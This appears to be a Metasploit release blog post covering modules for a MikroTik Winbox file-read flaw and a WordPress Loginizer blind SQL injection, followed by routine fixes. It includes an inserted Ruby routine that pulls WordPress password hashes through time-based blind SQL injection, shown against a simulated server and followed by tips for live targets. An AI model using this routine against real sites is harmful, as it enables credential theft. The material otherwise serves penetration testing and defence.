h00die contributed the Mikrotik unauthenticated directory traversal file read auxiliary gather module, largely a port of the PoC by Ali Mosajjal. The vulnerability, CVE-2018-14847, allows any file on the router to be read through the Winbox server in RouterOS, because the server trusts the Winbox client and does not validate the requested path. The auxiliary/gather/mikrotik_winbox_fileread
module exploits this by communicating with the Winbox server on port 8291 and requesting the system user database file. One would hope all vulnerable MikroTik routers have been patched by now, but if you happen to discover a vulnerable instance it is time to dump the credentials. Vulnerable versions of MikroTik RouterOS are:
Security researcher mslavco discovered an unauthenticated, time-based blind SQL injection in the Loginizer WordPress plugin's log
parameter. h00die contributed the WordPress Loginizer log SQLi Scanner auxiliary module, which exploits the vulnerability (CVE-2020-27615) to extract user credentials and store them in the Metasploit database. Loginizer versions 1.6.3 and earlier are vulnerable to the auxiliary/scanner/http/wp_loginizer_log_sqli
module. Note that successful exploitation requires WordPress 5.4 (or newer) or 5.5 (or newer).
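The following is an added illustration of how a time-based blind SQL injection like the Loginizer one is turned into data extraction; it is not the Metasploit module's code. The payload template is a generic MySQL pattern (an assumption, not the exact injection string the Loginizer log parameter needs), the wp_users/user_pass names are WordPress defaults, and the "server" is a constructed stand-in that evaluates the injected condition against a fixed secret so the example runs offline.

```ruby
# Added illustration of time-based blind SQL injection extraction (not the
# Metasploit wp_loginizer_log_sqli module's code). The payload template is a
# generic MySQL pattern and is an assumption, not the exact injection string
# the Loginizer vulnerability needs.

SLEEP_SECONDS = 5       # SLEEP() argument injected into the query
DELAY_THRESHOLD = 3.0   # a response slower than this is treated as "true"

# Payload that makes the backend sleep only when the byte at 1-based position
# `pos` of the result of `expr` is greater than `guess`.
def sleep_payload(expr, pos, guess, sleep: SLEEP_SECONDS)
  "x' AND IF(ORD(SUBSTRING((#{expr}),#{pos},1))>#{guess},SLEEP(#{sleep}),0) AND 'a'='a"
end

# Recover one byte with a binary search over 0..255 (eight timed requests).
# `oracle` takes a payload and returns the measured response time in seconds.
def extract_byte(expr, pos, oracle)
  low, high = 0, 255
  while low < high
    mid = (low + high) / 2
    if oracle.call(sleep_payload(expr, pos, mid)) > DELAY_THRESHOLD
      low = mid + 1   # delayed: the byte is greater than mid
    else
      high = mid      # no delay: the byte is at most mid
    end
  end
  low
end

# Recover the whole value byte by byte. MySQL's SUBSTRING() past the end of
# the string yields '', and ORD('') is 0, which marks the end of the value.
def extract_string(expr, max_len, oracle)
  out = +''
  (1..max_len).each do |pos|
    byte = extract_byte(expr, pos, oracle)
    break if byte.zero?
    out << byte.chr
  end
  out
end

# Constructed stand-in for the vulnerable server so the example runs offline:
# it pulls pos/guess/sleep back out of the payload, evaluates the condition
# against a fixed secret, and reports a response time that includes the
# SLEEP() when the condition holds plus a little random network jitter.
PAYLOAD_RE = /,(\d+),1\)\)>(\d+),SLEEP\((\d+)\)/

def simulated_oracle(secret, jitter: 0.2)
  lambda do |payload|
    m = PAYLOAD_RE.match(payload) or raise ArgumentError, "unexpected payload: #{payload}"
    pos, guess, sleep = m.captures.map(&:to_i)
    byte = secret.getbyte(pos - 1) || 0
    (byte > guess ? sleep : 0) + rand * jitter
  end
end

if $PROGRAM_NAME == __FILE__
  # Constructed sample secret: a phpass-style hash like those in wp_users.user_pass.
  oracle = simulated_oracle('$P$BExampleHashValue012345')
  puts extract_string('SELECT user_pass FROM wp_users LIMIT 1', 64, oracle)
end
```

Against a live target the oracle is an HTTP request timed end to end, so calibrate DELAY_THRESHOLD against a measured baseline rather than a fixed constant, and re-issue any measurement that lands near the threshold: a single slow response on a loaded server flips a bit in the binary search and corrupts every later byte.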
- Support for Raw-MD5u hashes, which Avira uses to store passwords.
- auxiliary/scanner/http/zabbix_login now supports Zabbix versions 3.x, 4.x, and 5.x, up to the latest 5.2 release.
- Replaced calls to the deprecated URI.encode function with Rex::Text.uri_encode in exploits/multi/http/php_fpm_rce.
- Fixed an issue in auxiliary/gather/enum_dns that only affects zone transfer enumeration (AXFR): the module now uses the nameservers specified in the datastore NS option.
- Fixed a bug in store_loot in which certain data types were not stored properly and caused a subsequent stack trace.
- Added the nasm dependency to ensure that tools/exploit/nasm_shell.rb works as expected when running inside of Docker.
As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:
If you are a git
user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).